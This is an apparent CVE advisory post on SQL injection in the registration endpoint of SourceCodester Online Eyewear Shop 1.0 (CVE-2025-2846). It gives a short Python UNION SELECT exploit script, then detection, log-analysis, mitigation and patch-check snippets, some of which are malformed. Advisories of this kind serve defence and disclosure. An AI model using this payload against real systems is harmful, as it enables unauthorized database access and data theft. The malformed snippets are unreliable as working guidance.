SourceCodester Online Eyewear Shop 10, SQL Injection, CVE-2025-2846 (Critical)

By /

Listen to this Post

How CVE-2025-2846 Works

The vulnerability exists in the registration component (/oews/classes/Users.php?f=registration) of SourceCodester Online Eyewear Shop 1.0. The application fails to sanitize user-supplied input in the `ID` parameter during registration, allowing attackers to inject malicious SQL queries. This occurs due to improper input validation when processing registration requests. The SQL injection enables unauthorized database access, potentially exposing sensitive customer data, admin credentials, or allowing remote code execution. The attack is exploitable remotely without authentication (PR:N in CVSS 4.0). The vulnerability scores 6.9 (MEDIUM) in CVSS-B but is marked critical due to its potential impact.

DailyCVE Form

Platform: SourceCodester Online Eyewear Shop
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/14/2025

What Undercode Say:

Exploitation:

import requests
target = "http://target.com/oews/classes/Users.php?f=registration"
payload = {"ID":"1' UNION SELECT 1,2,3,4,5,6,7,8,9,database()-- -"}
r = requests.post(target, data=payload)
print(r.text)

Detection:

SELECT FROM users WHERE id = '1''; -- Triggers error if vulnerable

Mitigation:

// Secure Users.php with prepared statements:
$stmt = $conn->prepare("INSERT INTO users (id, ...) VALUES (?, ...)");
$stmt->bind_param("s", $_POST['ID']);

WAF Rules:

location ~ /oews/classes/Users.php {
deny all; Temporary fix
}

Log Analysis:

grep -E 'POST.Users.php.ID=' /var/log/apache2/access.log

Database Cleanup:

REVOKE ALL PRIVILEGES ON eyewear_db FROM 'webuser'@'%';

Patch Verification:

curl -X POST "http://localhost/oews/classes/Users.php" -d "ID=1'" | grep -q "error" && echo "Vulnerable"

Exploit Impact:

  • Data exfiltration
  • Authentication bypass
  • RCE via database functions

Protection Checklist:

1. Update to patched version

2. Implement parameterized queries

3. Restrict database permissions

4. Enable WAF filtering

5. Monitor suspicious registration attempts

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top